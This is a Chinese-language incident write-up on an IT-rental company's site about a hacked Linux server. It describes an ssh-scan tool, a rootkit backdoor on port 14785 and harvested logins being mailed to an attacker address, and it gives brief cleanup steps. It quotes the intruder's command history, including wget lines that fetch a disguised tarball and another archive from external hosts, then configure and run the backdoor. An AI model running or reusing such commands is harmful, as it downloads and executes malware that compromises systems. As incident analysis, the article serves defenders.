中文版  English 
  首页|   服务器租赁|   小型机租赁|   存储租赁|   网络设备租赁|   小型机配件|   租赁专题|   动态|   资料|   培训|   服务

当linux服务器遭遇入侵该怎么办--北京远志IT租赁-小型机租赁|服务器租赁|小型机配件|EMC配件|HDS配件|电脑租赁|网络设备租赁
您所在的位置  首页 -> 小型机实验室培训
当linux服务器遭遇入侵该怎么办

小型机实验室培训    阅读:9306    文章来源:远志IT租赁     发布时间:2010/10/20

当一台linux服务器老向外ssh扫描,登陆到服务器上,查看进程发现大量ssh-scan在运行,运行用户为mircte,查找ssh-scan这个文件,确定所在位置/var/log目录下。

黑客进入服务器后所做的操作:

1、向/var/tmp/下上传了两个恶意程序

其中wtf为向外扫描其它服务器的ssh-scan黑客软件,.access.log文件下存放有rootkit后门,服务器被当成了肉鸡跳板,开放14785端口等待入侵者连接,扫描其它服务器所得到的账号都发送到diavolu_gol@yahoo.com这个邮箱。

2、入侵者登陆记录

85.120.78.140的IP来自罗马尼亚。

3、wget http://pinky.clan.su/scan/wtf.jpg; tar zxvf wtf.jpg

wget adelinuangell.lx.ro/ryo.tar

tar xvf ryo.tar

cd 、.access.log

。/config Ady 14785

。/run

结束进程。
删掉程序。
删掉用户。
修改root密码。

 

 

小型机实验室培训
  · 小型机实验室培训业务简介  
  · 小型机实验室培训的主要客户类型  
  · 小型机实验室培训环境列表  
  · Unix操作系统实验培训环境  
  · 卷管理软件实验培训环境  
  · 集群管理软件实验培训环境  
  · 数据备份软件实验培训环境  
  · 数据库软件实验培训环境  
 
热点排行
  ·IBM DS4300电池库存现货热销 
  ·远志新到IBM P690小型机配件 
  ·远志IBM ds5020存储租赁|IBM服务器租赁 
  ·SUN服务器租赁-SUN T5140服务器租赁 
  ·新到IBM服务器配件|IBM小型机配件 
  ·SUN服务器租赁-SUN 6140存储租赁 
  ·如何更换IBM DS4700电池 
  ·IBM小型机配件故障定位 
  ·EMC存储租赁-CX系列为什么最少需要5块硬盘? 
  ·IBM P6 570(9117-MMA)适用小型机配件 
  ·IBM小型机租赁中HA故障定位及解决方法 
  ·新到IBM P6 550(8203-E8A)适用小型机配件 
首页 | 关于远志 | 企业文化 | 成功案例 | 联系我们 | 诚聘英才 | 申请友情链接
北京远志IT租赁电脑租赁小型机租赁服务器租赁存储租赁网络设备租赁打印机租赁
地址:北京市昌平区北清创意园2号楼3单元101室
总机: 400-886-8090 电话: 010-51655881
网络许可证:京ICP备13023975号-2号 京公网安备110108002524号 北京远志宏达科技发展有限公司版权所有